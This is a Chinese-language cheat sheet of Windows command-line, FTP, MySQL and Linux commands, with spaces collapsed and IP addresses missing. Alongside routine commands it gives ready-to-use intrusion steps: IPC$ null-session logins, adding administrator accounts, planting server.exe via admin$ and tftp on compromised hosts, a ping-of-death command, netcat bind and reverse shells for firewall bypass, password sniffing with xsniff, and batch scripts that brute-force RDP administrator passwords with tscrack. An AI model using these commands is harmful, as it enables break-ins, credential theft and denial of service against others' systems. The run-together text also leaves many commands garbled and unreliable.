DOS命令收藏全套快捷方式：windows+R輸入cmd【1】netuse\\ip\ipc$""/user:""建立IPC空鏈接netuse\\ip\ipc$"密碼"/user:"用戶名"建立IPC非空鏈接netuseh:\\ip\c$"密碼"/user:"用戶名"直接登陸后映射對方C：到本地為H:netuseh:\\ip\c$登陸后映射對方C：到本地為H:netuse\\ip\ipc$/del刪除IPC鏈接netuseh:/del刪除映射對方到本地的為H:的映射netuser用戶名密碼/add建立用戶netuserguest/active:yes激活guest用戶netuser查看有哪些用戶netuser帳戶名查看帳戶的屬性netlocalgroup***istrators用戶名/add把“用戶”添加到管理員中使其具有管理員權限,注意：***istrator后加s用復數netstart查看開啟了哪些服務netstart服務名開啟服務；(如:netstarttelnet，netstartschedule)netstop服務名停止某服務nettime\\目標ip查看對方時間nettime\\目標ip/set設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息netview查看本地局域網內開啟了哪些共享netview\\ip查看對方局域網內開啟了哪些共享netconfig顯示系統網絡設置netlogoff斷開連接的共享netpause服務名暫停某服務netsendip"文本信息"向對方發信息netver局域網內正在使用的網絡連接類型和信息netshare查看本地開啟的共享netshareipc$開啟ipc$共享netshareipc$/del刪除ipc$共享netsharec$/del刪除C：共享netuserguest12345用guest用戶登陸后用將密碼改為12345netpassword密碼更改系統登陸密碼netstat-a查看開啟了哪些端口,常用netstat-annetstat-n查看端口的網絡連接情況，常用netstat-annetstat-v查看正在進行的工作netstat-p協議名例：netstat-ptcq/ip查看某協議使用情況（查看tcp/ip協議使用情況）netstat-s查看正在使用的所有協議使用情況nbtstat-Aip對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫tracert-參數ip(或計算機名)跟蹤路由（數據包），參數：“-w數字”用于設置超時間隔。pingip(或域名)向對方主機發送默認大小為32字節的數據，參數：“-l[空格]數據包大小”；“-n發送數據次數”；“-t”指一直ping。ping-t-l65550ip死*之ping(發送大于64K的文件并一直ping就成了死*之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息tlist-t以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)kill-F進程名加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)del-F文件名加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR*.*”表示刪除當前目錄下所有只讀文件，“DEL/A-S*.*”表示刪除當前目錄下除系統文件以外的所有文件【2】del/S/Q目錄或用：rmdir/s/Q目錄/S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）move盤符\路徑\要移動的文件名存放移動文件的路徑\移動后文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋fcone.*ttwo.*t>3st.*t對比二個文件并把不同之處輸出到3st.*t文件中，">"和">>"是重定向命令atid號開啟已注冊的某個計劃任務at/delete停止所有計劃任務，用參數/yes則不需要確認就直接停止atid號/delete停止某個已注冊的計劃任務at查看所有的計劃任務at\\iptime程序名(或一個命令)/r在某時間運行對方某程序并重新啟動計算機fingerusername@host查看最近有哪些用戶登陸telnetip端口遠和登陸服務器,默認端口為23openip連接到IP（屬telnet登陸后的命令）telnet在本機上直接鍵入telnet將進入本機的telnetcopy路徑\文件名1路徑\文件名2/y復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件copyc:\srv.exe\\ip\***$復制本地c:\srv.exe到對方的***下cppy1st.jpg/b+2st.*t/a3st.jpg將2st.*t的內容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.*t文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件copy\\ip\***$\svv.exec:\或:copy\\ip\***$\*.*復制對方***i$共享下的srv.exe文件（所有文件）至本地C：xcopy要復制的文件或目錄樹目標地址\目錄名復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件tftp-i自己IP(用肉機作跳板時這用肉機IP)getserver.exec:\server.exe登陸后，將“IP”的server.exe下載到目標主機c:\server.exe參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i則以ASCII模式（傳送文本文件模式）進行傳送tftp-i對方IPputc:\server.exe登陸后，上傳本地c:\server.exe至主機ftpip端口用于上傳文件至服務器或進行文件操作，默認端口為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)routeprint顯示出IP路由，將主要顯示網絡地址Networkaddres，子網掩碼Netmask，網關地址Gatewayaddres，接口地址Interfacearp查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp-a將顯示出全部信息start程序名或命令/max或/min新開一個新窗口并最大化（最小化）運行某程序或命令mem查看cpu使用情況attrib文件名(目錄名)查看某文件（目錄）的屬性attrib文件名-A-R-S-H或+A+R+S+H去掉(添加)某文件的存檔，只讀，系統，隱藏屬性；用＋則是添加為某屬性dir查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間date/t、time/t使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間，而不必輸入新日期和時間set指定環境變量名稱=要指派給變量的字符設置環境變量set顯示當前所有的環境變量setp(或其它字符)顯示出當前以字符p(或其它字符)開頭的所有環境變量pause暫停批處理程序，并顯示出：請按任意鍵繼續....if在批處理程序中執行條件處理（更多說明見if命令及變量）goto標簽將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：“：start”標簽）call路徑\批處理文件名從批處理程序中調用另一個批處理程序（更多說明見call/?）for對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變量）echoon或off打開或關閉echo，僅用echo不加參數則顯示當前echo設置echo信息在屏幕上顯示出信息echo信息>>pass.*t將"信息"保存到pass.*t文件中findstr"Hello"aa.*t在aa.*t文件中尋找字符串hellofind文件名查找某文件title標題名字更改CMD窗口標題名字color顏色值設置cmd控制臺前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白prompt名稱更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\)【3】ver在DOS窗口下顯示版本信息winver彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）format盤符/FS:類型格式化磁盤,類型:FAT、FAT32、NTFS,例：FormatD:/FS:NTFSmd目錄名創建目錄replace源文件要替換文件的目錄替換文件ren原文件名新文件名重命名文件名tree以樹形結構顯示出目錄，用參數-f將列出第個文件夾中文件名稱type文件名顯示文本文件的內容more文件名逐屏顯示輸出文件doskey要鎖定的命令＝字符doskey要解鎖命令=為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，并創建宏)。如：鎖定dir命令：doskeydir=entsky(不能用doskeydir=dir)；解鎖：doskeydir=taskmgr調出任務管理器chkdsk/FD:檢查磁盤D并顯示狀態報告；加參數/f并修復磁盤上的錯誤tlntadmntelnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認端口23為其它任何端口exit退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exepath路徑\可執行文件的文件名為可執行文件設置一個路徑。cmd啟動一個win2K命令解釋窗口。參數：/eff、/en關閉、開啟命令擴展；更我詳細說明見cmd/?regedit/s注冊表文件名導入注冊表；參數/S指安靜模式導入，無任何提示；regedit/e注冊表文件名導出注冊表cacls文件名參數顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D用戶名:設定拒絕某用戶訪問；/P用戶名:perm替換指定用戶的訪問權限；/G用戶名:perm賦予指定用戶訪問權限；Perm可以是:N無，R讀取，W寫入，C更改(寫入)，F完全控制；例：caclsD:\test.*t/Dpub設定d:\test.*t拒絕pub用戶訪問。cacls文件名查看文件的訪問用戶權限列表REM文本內容在批處理文件中添加注解netsh查看或更改本地網絡配置情況【4】IIS服務命令：iisreset/reboot重啟win2k計算機（但有提示系統將重啟信息出現）iisreset/start或stop啟動（停止）所有Internet服務iisreset/restart停止然后重新啟動所有Internet服務iisreset/status顯示所有Internet服務狀態iisreset/enable或disable在本地系統上啟用（禁用）Internet服務的重新啟動iisreset/rebootonerror當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機iisreset/noforce若無法停止Internet服務，將不會強制終止Internet服務iisreset/timeoutVal在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。FTP命令：(后面有詳細說明內容)ftp的命令行格式為:ftp－v－d－i－n－g[主機名]－v顯示遠程服務器的所有響應信息。－d使用調試方式。－n限制ftp的自動登錄,即不使用.netrc文件。－g取消全局文件名。help[命令]或？[命令]查看命令說明bye或quit終止主機FTP進程,并退出FTP管理方式.pwd列出當前遠端主機目錄put或send本地文件名[上傳到主機上的文件名]將本地一個文件傳送至遠端主機中get或recv[遠程主機文件名][下載到本地后的文件名]從遠端主機中傳送至本地主機中mget[remote-files]從遠端主機接收一批文件至本地主機mputlocal-files將本地主機中一批文件傳送至遠端主機dir或ls[remote-directory][local-file]列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件ascii設定以ASCII方式傳送文件(缺省值)bin或image設定以二進制方式傳送文件bell每完成一次文件傳送,報警提示cdup返回上一級目錄close中斷與遠程服務器的ftp會話(與open對應)openhost[port]建立指定ftp服務器連接,可指定連接端口delete刪除遠端主機中的文件mdelete[remote-files]刪除一批文件mkdirdirectory-name在遠端主機中建立目錄rename[from][to]改變遠端主機中的文件名rmdirdirectory-name刪除遠端主機中的目錄status顯示當前FTP的狀態system顯示遠端主機系統類型useruser-name[password][account]重新以別的用戶名登錄遠端主機openhost[port]重新建立一個新的連接prompt交互提示模式macdef定義宏命令lcd改變當前本地主機的工作目錄,如果缺省,就轉到當前用戶的HOME目錄chmod改變遠端主機的文件權限case當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母cdremote－dir進入遠程主機目錄cdup進入遠程主機目錄的父目錄!在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip【5】MYSQL命令：mysql-h主機地址-u用戶名－p密碼連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。（例：mysql-h10-Uroot-P123456注:u與root可以不用加空格，其它也一樣）exit退出MYSQLmysql***-u用戶名-p舊密碼password新密碼修改密碼grantselecton數據庫.*to用戶名@登錄主機identifiedby\"密碼\";增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以后面都帶一個分號作為命令結束符）showdatabases;顯示數據庫列表。剛開始時才兩個數據庫：mysql和test。mysql庫很重要它里面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。usemysql；showtables;顯示庫中的數據表describe表名;顯示數據表的結構createdatabase庫名;建庫use庫名；createtable表名(字段設定列表)；建表dropdatabase庫名;droptable表名；刪庫和刪表deletefrom表名;將表中記錄清空select*from表名;顯示表中的記錄mysqldump--optschool>school.bbb備份數據庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將數據庫school備份到school.bbb文件，school.bbb是一個文本文件，文件名任取，打開看看你會有新發現。win2003系統下新增命令（實用部份）：shutdown/參數關閉或重啟本地或遠程主機。參數說明：/S關閉主機，/R重啟主機，/T數字設定延時的時間，范圍0～180秒之間，/A取消開機，/M//IP指定的遠程主機。例：shutdown/r/t0立即重啟本地主機（無延時）taskill/參數進程名或進程的pid終止一個或多個任務和進程。參數說明：/PID要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM要終止的進程的進程名，/F強制終止進程，/T終止指定的進程及他所啟動的子進程。tasklist顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。參數說明：/M列出當前進程加載的dll文件，/SVC顯示出每個進程對應的服務，無參數時就只列出當前的進程。【6】Linux系統下基本命令：要區分大小寫uname顯示版本信息（同win2K的ver）dir顯示當前目錄文件,ls-al顯示包括隱藏文件（同win2K的dir）pwd查詢當前所在的目錄位置cdcd..回到上一層目錄，注意cd與..之間有空格。cd/返回到根目錄。cat文件名查看文件內容cat>abc.*t往abc.*t文件中寫上內容。more文件名以一頁一頁的方式顯示一個文本文件。cp復制文件mv移動文件rm文件名刪除文件，rm-a目錄名刪除目錄及子目錄mkdir目錄名建立目錄rmdir刪除子目錄，目錄內沒有文檔。chmod設定檔案或目錄的存取權限grep在檔案中查找字符串diff檔案文件比較find檔案搜尋date現在的日期、時間who查詢目前和你使用同一臺機器的人以及Login時間地點w查詢目前上機者的詳細資料whoami查看自己的帳號名稱groups查看某人的Grouppasswd更改密碼history查看自己下過的命令ps顯示進程狀態kill停止某進程gcc黑客通常用它來編譯C語言寫的文件su權限轉換為指定使用者telnetIPtelnet連接對方主機（同win2K），當出現bash$時就說明連接成功。ftpftp連接上某服務器（同win2K）【附】批處理命令與變量1：for命令及變量基本格式：FOR/參數%variableIN(set)DOcommand[command_parameters]%variable:指定一個單一字母可替換的參數，如：%i，而指定一個變量則用：%%i，而調用變量時用：%i%，變量是區分大小寫的（%i不等于%I）。批處理每次能處理的變量從%0—%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2—%9指輸入的第2-9個值；例：netuse\\ip\ipc$pass/user:user中ip為%1,pass為%2,user為%3(set):指定一個或一組文件，可使用通配符，如：(D:\user.*t)和(11254)(1-1254),{“(11254)”第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；“(1-1254)”說明：即從254到1}command：指定對第個文件執行的命令，如：netuse命令；如要執行多個命令時，命令這間加：&來隔開command_parameters：為特定命令指定參數或命令行開關IN(set)：指在(set)中取值；DOcommand：指執行command參數：/L指用增量形式{(set)為增量形式時}；/F指從文件中不斷取值，直到取完為止{(set)為文件時，如(d:\pass.*t)時}。用法舉例：@echooffecho用法格式：test.bat*.*.*>test.*tfor/L%%Gin(11254)doecho%1.%%G>>test.*t&netuse\\%1.%%G/user:***istrator|find"命令成功完成">>test.*t存為test.bat了ipc$后，在結果中用find查看是否有"命令成功完成"信息；%1.%%G為完整的IP地址；(11254)指起始值，增長量，結止值。@echooffecho用法格式：ok.batipFOR/F%%iIN(D:\user.dic)DOsmb.exe%1%%iD:\pass.dic200存為：ok.exe說明：輸入一個IP后，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。【7】2：if命令及變量基本格式：IF[not]errorlevel數字命令語句如果程序運行最后返回一個等于或大于指定數字的退出編碼，指定條件為“真”。例：IFerrorlevel0命令指程序執行后返回的值為0時，就值行后面的命令；IFnoterrorlevel1命令指程序執行最后返回的值不等于1，就執行后面的命令。0指發現并成功執行（真）；1指沒有發現、沒執行（假）。IF[not]字符串1==字符串2命令語句如果指定的文本字符串匹配（即：字符串1等于字符串2），就執行后面的命令。例：“if"%2%"=="4"gotostart”指：如果輸入的第二個變量為4時，執行后面的命令（注意：調用變量時就%變量名%并加""）IF[not]exist文件名命令語句如果指定的文件名存在，就執行后面的命令。例：“ifnotnc.exegotoend”指：如果沒有發現nc.exe文件就跳到":end"標簽處。IF[not]errorlevel數字命令語句else命令語句或IF[not]字符串1==字符串2命令語句else命令語句或IF[not]exist文件名命令語句else命令語句加上：else命令語句后指：當前面的條件不成立時，就指行else后面的命令。注意：else必須與if在同一行才有效。當有del命令時需把del命令全部內容用<>括起來，因為del命令要單獨一行時才能執行，用上<>后就等于是單獨一行了；例如：“ifexisttest.*t.<deltest.*t.>elseechotest.*t.missing”，注意命令中的“.”（二）【系統外部命令(均需下載相關工具)】1、瑞士軍刀：nc.exe參數說明：-h查看幫助信息-d后臺模式-eprog程序重定向，一但連接就執行〔危險〕-isecs延時的間隔-l監聽模式，用于入站連接-L監聽模式，連接天閉后仍然繼續監聽，直到CTR+C-nIP地址，不能用域名-ofilm記錄16進制的傳輸-p[空格]端口本地端口號-r隨機本地及遠程端口-t使用Telnet交互方式-uUDP模式-v詳細輸出，用-vv將更詳細-w數字timeout延時間隔-z將輸入，輸出關掉（用于掃錨時）基本用法：nc-nvv80連接到主機的80端口nc-l-p80開啟本機的TCP80端口并監聽nc-nvv-w2-z80-1024掃錨的80-1024端口nc-l-p5354-t-ec:winntsystem32cmd.exe綁定remote主機的cmdshell在remote的TCP5354端口nc-t-ec:winntsystem32cmd.exe5354梆定remote主機的cmdshell并反向連接的5354端口高級用法：nc-L-p80作為蜜罐用1：開啟并不停地監聽80端口，直到CTR+C為止nc-L-p80>c:\log.*t作為蜜罐用2：開啟并不停地監聽80端口，直到CTR+C,同時把結果輸出到c:\log.*tnc-L-p80<c:\honeyport.*t作為蜜罐用3-1：開啟并不停地監聽80端口，直到CTR+C,并把c:\honeyport.*t中內容送入管道中，亦可起到傳送文件作用type.exec:\honeyport|nc-L-p80作為蜜罐用3-2：開啟并不停地監聽80端口，直到CTR+C,并把c:\honeyport.*t中內容送入管道中,亦可起到傳送文件作用本機上用：nc-l-p本機端口在對方主機上用：nc-ecmd.exe本機IP-p本機端口*win2Knc-e/bin/sh本機IP-p本機端口*linux,unix反向連接突破對方主機的防火墻本機上用：nc-d-l-p本機端口<要傳送的文件路徑及名稱在對方主機上用：nc-vv本機IP本機端口>存放文件的路徑及名稱傳送文件到對方主機備注：|管道命令<或>重定向命令。“<”，例如：tlntadmn<test.*t指把test.*t的內容賦值給tlntadmn命令＠表示執行＠后面的命令，但不會顯示出來（后臺執行）；例：＠dirc:\winnt>>d:\log.*t意思是：后臺執行dir，并把結果存在d:\log.*t中>與>>的區別">"指：覆蓋；">>"指：保存到(添加到）。如：@dirc:\winnt>>d:\log.*t和@dirc:\winnt>d:\log.*t二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。【8】2、掃錨工具：xscan.exe基本格式xscan-host<起始IP>[-<終止IP>]<檢測項目>[其他選項]掃錨"起始IP到終止IP"段的所有主機信息xscan-file<主機列表文件名><檢測項目>[其他選項]掃錨"主機IP列表文件名"中的所有主機信息檢測項目-active檢測主機是否存活-os檢測遠程操作系統類型（通過NETBIOS和SNMP協議）-port檢測常用服務的端口狀態-ftp檢測FTP弱口令-pub檢測FTP服務匿名用戶寫權限-pop3檢測POP3-Server弱口令-smtp檢測SMTP-Server漏洞-sql檢測SQL-Server弱口令-smb檢測NT-Server弱口令-iis檢測IIS編碼/解碼漏洞-cgi檢測CGI漏洞-nasl加載Nessus攻擊腳本-all檢測以上所有項目其它選項-i適配器編號設置網絡適配器,<適配器編號>可通過"-l"參數獲取-l顯示所有網絡適配器-v顯示詳細掃描進度-p跳過沒有響應的主機-o跳過沒有檢測到開放端口的主機-t并發線程數量,并發主機數量指定最大并發線程數量和并發主機數量,默認數量為100,10-log文件名指定掃描報告文件名(后綴為：TXT或HTML格式的文件)用法示例xscan-host

-55-all-active-p檢測

-55網段內主機的所有漏洞，跳過無響應的主機xscan-host

-55-port-smb-t150-o檢測

-55網段內主機的標準端口狀態，NT弱口令用戶，最大并發線程數量為150，跳過沒有檢測到開放端口的主機xscan-filehostlist.*t-port-cgi-t200,5-v-o檢測“hostlist.*t”文件中列出的所有主機的標準端口狀態，CGI漏洞，最大并發線程數量為200，同一時刻最多檢測5臺主機，顯示詳細檢測進度，跳過沒有檢測到開放端口的主機【9】3、命令行方式嗅探器:xsniff.exe可捕獲局域網內FTP/SMTP/POP3/HTTP協議密碼參數說明-tcp輸出TCP數據報-udp輸出UDP數據報-icmp輸出ICMP數據報-pass過濾密碼信息-hide后臺運行-host解析主機名-addrIP地址過濾IP地址-port端口過濾端口-log文件名將輸出保存到文件-asc以ASCII形式輸出-hex以16進制形式輸出用法示例xsniff.exe-pass-hide-logpass.log后臺運行嗅探密碼并將密碼信息保存在pass.log文件中xsniff.exe-tcp-udp-asc-addr嗅探并過濾tcp和udp信息并以ASCII格式輸出4、終端服務密碼破解:tscrack.exe參數說明-h顯示使用幫助-v顯示版本信息-s在屏幕上打出解密能力-b密碼錯誤時發出的聲音-t同是發出多個連接（多線程）-NPreventSystemLogentriesontargetedserver-U卸載移除tscrack組件-f使用－f后面的密碼-F間隔時間（頻率）-l使用－l后面的用戶名-w使用－w后面的密碼字典-p使用－p后面的密碼-D登錄主頁面用法示例tscrack-l***istrator-wpass.dic遠程用密碼字典文件暴破主機的***istrator的登陸密碼tscrack-l***istrator-p123456用密碼123456遠程登陸的***istrator用戶@ifnotexistipcscan.*tgotonoscan@for/f"tokens=1delims="%%iin(3389.*t)docallhack.bat%%inscan@echo3389.*tnofindorscanfaild(①存為3389.bat)（假設現有用SuperScan或其它掃錨器掃到一批開有3389的主機IP列表文件3389.*t)3389.bat意思是：從3389.*t文件中取一個IP，接著運行hack.bat@ifnotexisttscrack.exegotonoscan@tscrack%1-l***istrator-wpass.dic>>rouji.*t:noscan@echotscrack.exenofindorscanfaild(②存為hack.bat)(運行3389.bat就OK，且3389.bat、hack.bat、3389.*t、pass.dic與tscrack.exe在同一個目錄下；就可以等待結果了)hack.bat意思是：運行tscrack.exe用字典暴破3389.*t中所有主機的***istrator密碼，并將破解結果保存在rouji.*t文件中。5、其它：Shutdown.exeShutdown\\IP地址t:2020秒后將對方NT自動關閉（Windows2003系統自帶工具，在Windows2000下用進就得下載此工具才能用。在前面Windows2003DOS命令中有詳細介紹。）fpipe.exe(TCP端口重定向工具)在第二篇中有詳細說明（端口重定向繞過防火墻）fpipe-l80-s1029-r80當有人掃錨你的80端口時，他掃到的結果會完全是的主機信息Fpipe-l23-s88-r23目標IP把本機向目標IP發送的23端口Telnet請求經端口重定向后，就通過88端口發送到目標IP的23端口。（與目標IP建立Telnet時本機就用的88端口與其相連接）然后：直接Telnet（本機IP）就連接到目標IP的23端口了。OpenTelnet.exe(遠程開啟telnet工具)opentelnet.exe\\IP帳號密碼ntlm認證方式Telnet端口（不需要上傳ntlm.exe破壞微軟的身份驗證方式）直接遠程開啟對方的telnet服務后，就可用telnet\\ip連接上對方。NTLM認證方式：０：不使用NTLM身份驗證；１：先嘗試NTLM身份驗證，如果失敗，再使用用戶名和密碼；２：只使用NTLM身份驗證。ResumeTelnet.exe(OpenTelnet附帶的另一個工具)resumetelnet.exe\\IP帳號密碼用Telnet連接完對方后，就用這個命令將對方的Telnet設置還原，并同時關閉Telnet服務。【10】6、FTP命令詳解：FTP命令是Internet用戶使用最頻繁的命令之一，熟悉并靈活應用FTP的內部命令，可以大大方便使用者，并收到事半功倍之效。如果你想學習使用進行后臺FTP下載，那么就必須學習FTP指令。FTP的命令行格式為：ftp-v-d-i-n-g[主機名]，其中-v顯示遠程服務器的所有響應信息；-n限制ftp的自動登錄，即不使用；.netrc文件；-d使用調試方式；-g取消全局文件名。FTP使用的內部命令如下(中括號表示可選項):1.![cmd[args]]：在本地機中執行交互shell，exit回到ftp環境，如：!ls*.zip2.$macro-ame[args]：執行宏定義macro-name。3.account[password]：提供登錄遠程系統成功后訪問系統資源所需的補充口令。4.appendlocal-file[remote-file]：將本地文件追加到遠程系統主機，若未指定遠程系統文件名，則使用本地文件名。5.ascii：使用ascii類型傳輸方式。6.bell：每個命令執行完畢后計算機響鈴一次。7.bin：使用二進制文件傳輸方式。8.bye：退出ftp會話過程。9.case：在使用mget時，將遠程主機文件名中的大寫轉為小寫字母。10.cdremote-dir：進入遠程主機目錄。11.cdup：進入遠程主機目錄的父目錄。12.chmodmodefile-name：將遠程主機文件file-name的存取方式設置為mode，如：chmod777a.out。13.close：中斷與遠程服務器的ftp會話(與open對應)。14.cr：使用asscii方式傳輸文件時，將回車換行轉換為回行。15.deleteremote-file：刪除遠程主機文件。16.debug[debug-value]：設置調試方式，顯示發送至遠程主機的每條命令，如：debup3，若設為0，表示取消debug。17.dir[remote-dir][local-file]：顯示遠程主機目錄，并將結果存入本地文件。18.disconnection：同close。19.formformat：將文件傳輸方式設置為format，缺省為file方式。20.getremote-file[local-file]：將遠程主機的文件remote-file傳至本地硬盤的local-file。21.glob：設置mdelete，mget，mput的文件名擴展，缺省時不擴展文件名，同命令行的-g參數。22.hash：每傳輸1024字節，顯示一個hash符號(#)。23.help[cmd]：顯示ftp內部命令cmd的幫助信息，如：helpget。24.idle[seconds]：將遠程服務器的休眠計時器設為[seconds]秒。25.image：設置二進制傳輸方式(同binary)。26.lcd[dir]：將本地工作目錄切換至dir。27.ls[remote-dir][local-file]：顯示遠程目錄remote-dir，并存入本地文件local-file。28.macdefmacro-name：定義一個宏，遇到macdef下的空行時，宏定義結束。29.mdelete[remote-file]：刪除遠程主機文件。30.mdirremote-fileslocal-file：與dir類似，但可指定多個遠程文件，如：mdir*.o.*.zipoutfile。31.mgetremote-files：傳輸多個遠程文件。32.mkdirdir-name：在遠程主機中建一目錄。33.mlsremote-filelocal-file：同nlist，但可指定多個文件名。34.mode[modename]：將文件傳輸方式設置為modename，缺省為stream方式。35.modtimefile-name：顯示遠程主機文件的最后修改時間。36.mputlocal-file：將多個文件傳輸至遠程主機。37.newerfile-name：如果遠程機中file-name的修改時間比本地硬盤同名文件的時間更近，則重傳該文件。38.nlist[remote-dir][local-file]：顯示遠程主機目錄的文件清單，并存入本地硬盤的local-file。39.nmap[inpatternoutpattern]：設置文件名映射機制，使得文件傳輸時，文件中的某些字符相互轉換，如：nmap$1.$2.$3[$1，$2].[$2，$3]，則傳輸文件a1.a2.a3時，文件名變為a1，a2。該命令特別適用于遠程主機為非UNIX機的情況。40.ntrans[inchars[outchars]]：設置文件名字符的翻譯機制，如ntrans1R，則文件名LLL將變為RRR。41.openhost[port]：建立指定ftp服務器連接，可指定連接端口。42.passive：進入被動傳輸方式。43.prompt：設置多個文件傳輸時的交互提示。44.proxyftp-cmd：在次要控制連接中，執行一條ftp命令，該命令允許連接兩個ftp服務器，以在兩個服務器間傳輸文件。第一條ftp命令必須為open，以首先建立兩個服務器間的連接。45.putlocal-file[remote-file]：將本地文件local-file傳送至遠程主機。46.pwd：顯示遠程主機的當前工作目錄。47.quit：同bye，退出ftp會話。48.quotearg1，arg2...：將參數逐字發至遠程ftp服務器，如：quotesyst.49.recvremote-file[local-file]：同get。50.regetremote-file[local-file]：類似于get，但若local-file存在，則從上次傳輸中斷處續傳。51.rhelp[cmd-name]：請求獲得遠程主機的幫助。52.rstatus[file-name]：若未指定文件名，則顯示遠程主機的狀態，否則顯示文件狀態。53.rename[from][to]：更改遠程主機文件名。54.reset：清除回答隊列。55.restartmarker：從指定的標志marker處，重新開始get或put，如：restart130。56.rmdirdir-name：刪除遠程主機目錄。57.runique：設置文件名只一性存儲，若文件存在，則在原文件后加后綴.1，.2等。58.sendlocal-file[remote-file]：同put。59.sendport：設置PORT命令的使用。60.sitearg1，arg2...：將參數作為SITE命令逐字發送至遠程ftp主機。61.sizefile-name：顯示遠程主機文件大小，如：siteidle7200。62.status：顯示當前ftp狀態。63.struct[struct-name]：將文件傳輸結構設置為struct-name，缺省時使用stream結構。64.sunique：將遠程主機文件名存儲設置為只一(與runique對應)。65.system：顯示遠程主機的操作系統類型。66.tenex：將文件傳輸類型設置為TENEX機的所需的類型。67.tick：設置傳輸時的字節計數器。68.trace：設置包跟蹤。69.type[type-name]：設置文件傳輸類型為type-name，缺省為ascii，如:typebinary，設置二進制傳輸方式。70.umask[newmask]：將遠程服務器的缺省umask設置為newmask，如：umask371.useruser-name[password][account]：向遠程主機表明自己的身份，需要口令時，必須輸入口令，如：useranonymousmy@email。72.verbose：同命令行的-v參數，即設置詳盡報告方式，ftp服務器的所有響應都將顯示給用戶，缺省為on.73.?[cmd]：同help.【11】7：計算機運行命令全集winver-----